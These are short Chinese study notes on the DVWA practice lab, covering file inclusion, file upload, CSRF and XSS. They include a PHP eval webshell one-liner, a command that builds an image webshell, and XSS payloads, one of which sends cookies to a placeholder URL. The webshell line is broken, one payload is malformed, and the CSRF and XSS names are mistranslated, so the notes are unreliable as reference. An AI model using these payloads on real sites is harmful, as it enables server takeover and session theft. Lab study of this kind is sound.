-
DVWA安装
-
先修改配置文件,打开页面后,链接数据库后,如果配置文件中密码正确,则登录:admin/password
1、文件包含
- 因为开启了allow_url_include参数,所以在url中可以通过file,https,http,php协议等访问文件,这样就可以实现加载恶意代码了
2、文件上传 - 可以通过上传php文件马,图片马,二次渲染,条件竞争等实现webshell上传
图片马合成 copy 1.png /b + 2.text /a 3.png
php的webshell <?php @eval($_REQUEST['cmd'];phpinfo();?)>
3、CSRF(远程服务请求伪造)
- 当真实用户向网站发起请求时,如果身份信息被第三方劫持,第三方返回给用户一个假的请求,用户误点击后,会触发csrf漏洞,可能造成密码修改,财务转账等问题。
4、XSS(跨站服务攻击)
- 反射型xss常出现在留言框处,一次性的
- 存储型xss是持久性的
- DOM型的xss常出现在下拉菜单控件等位置
<script>alert(/xss)</script> <script>alert(document.cookie)</script> <script>var img = new Image();img.src="url/2?cookies="+document.cookie;</script>